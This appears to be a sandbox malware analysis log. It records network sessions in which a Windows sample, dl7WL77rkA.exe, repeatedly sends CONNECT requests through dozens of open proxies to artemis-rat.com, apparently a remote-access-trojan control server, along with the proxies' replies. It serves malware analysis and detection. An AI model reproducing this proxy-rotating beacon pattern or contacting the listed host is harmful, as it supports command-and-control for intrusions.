                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            812192.168.2.551589163.172.147.89163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.711738110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.904849052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.905471087 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.999325037 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            813192.168.2.552158171.103.58.12280803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.711910963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.129942894 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            814192.168.2.552382137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.713485956 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            815192.168.2.552286146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.713773966 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            816192.168.2.551610161.156.199.78803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.720222950 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.751326084 CET | 75 | IN | HTTP/1.0 200 Connection Established
Proxy-agent: Apache/2.4.6 (CentOS)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            817192.168.2.55178172.167.222.113125813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.725864887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.811336040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.811523914 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.905200005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
818192.168.2.552341104.20.24.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.753374100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.907713890 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
819192.168.2.552350203.30.190.172803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.758878946 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.913419962 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
820192.168.2.550203103.76.12.5831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.768424988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.141925097 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
821192.168.2.552265188.166.17.1888813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.768624067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.067239046 CET | 310 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 150
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
822192.168.2.552357104.16.106.65803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.768748045 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.923418999 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
823192.168.2.552212103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.770332098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
824192.168.2.552363104.23.125.117803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.770795107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.925318003 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
825192.168.2.55226838.242.251.177485863876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.771652937 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
826192.168.2.550807116.106.105.5510803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.771688938 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            827192.168.2.54994549.145.119.10280853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.780327082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.584580898 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            828192.168.2.552216171.244.140.160270203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.789755106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701880932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108232975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796564102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            829192.168.2.55155945.150.25.13280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.789757013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811372042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.811556101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905198097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            830192.168.2.551801162.241.46.40494013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.790402889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811368942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            831192.168.2.55230472.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791189909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            832192.168.2.551632171.244.140.160623103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791192055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905066013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            833192.168.2.55230598.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791333914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            834192.168.2.552301130.162.213.17531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791459084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.108472109 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            835192.168.2.55228151.89.173.40110583876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791460037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592395067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.499044895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405467987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093115091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905210018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592720032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.904906034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            836192.168.2.55233138.162.1.14331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791687965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.206218958 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            837192.168.2.5522858.217.95.4488993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.791781902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.107789040 CET711INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.25.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.25.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            838192.168.2.552227197.242.146.10931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.795893908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701843023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
